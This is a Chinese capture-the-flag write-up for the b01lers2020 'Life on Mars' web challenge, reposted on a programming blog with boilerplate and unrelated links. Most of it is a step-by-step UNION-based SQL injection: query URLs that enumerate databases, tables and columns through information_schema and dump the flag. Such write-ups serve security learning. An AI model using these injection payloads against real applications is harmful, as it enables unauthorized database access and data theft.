[b01lers2020]Life on Mars
2022/4/13 23:20:14
本文主要是介绍[b01lers2020]Life on Mars,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
[b01lers2020]Life on Mars WriteUp
知识点
- sql注入
- 难点在于发现这是个sql注入
题解
-
长记性了,我先扫一遍看看有没有什么文件备份,泄露之类的。发现没有。
-
抓个包看看,发现莫名参数,最先想到的就是模板注入吧,然后发现是sql注入
-
有两个回显,啥也没过滤,就是sql注入那一套,干就行了
-
/query?search=olympus_mons%20union%20select%202,database()&{}&_=1649851408180
//aliens
-
/query?search=olympus_mons%20union%20select%202,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='aliens'
//"amazonis_planitia,arabia_terra,chryse_planitia,hellas_basin,hesperia_planum,noachis_terra,olympus_mons,tharsis_rise,utopia_basin"
表名好多啊
-
一个一个试吧,MD,都没有,靠。
-
爆其他的数据库
/query?search=olympus_mons%20union%20select%202,group_concat(schema_name)%20from%20information_schema.schemata
//information_schema,alien_code,aliens
-
爆alien_code的表
/query?search=olympus_mons%20union%20select%202,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='alien_code'
//code
-
/query?search=olympus_mons%20union%20select%202,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='code'
//id,code
-
/query?search=olympus_mons%20union%20select%202,group_concat(id,code)%20from%20alien_code.code
//0flag{.。。。。。。。。。。。。。。。。。。}
这篇关于[b01lers2020]Life on Mars的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-23Springboot应用的多环境打包入门
- 2024-11-23Springboot应用的生产发布入门教程
- 2024-11-23Python编程入门指南
- 2024-11-23Java创业入门:从零开始的编程之旅
- 2024-11-23Java创业入门:新手必读的Java编程与创业指南
- 2024-11-23Java对接阿里云智能语音服务入门详解
- 2024-11-23Java对接阿里云智能语音服务入门教程
- 2024-11-23JAVA对接阿里云智能语音服务入门教程
- 2024-11-23Java副业入门:初学者的简单教程
- 2024-11-23JAVA副业入门:初学者的实战指南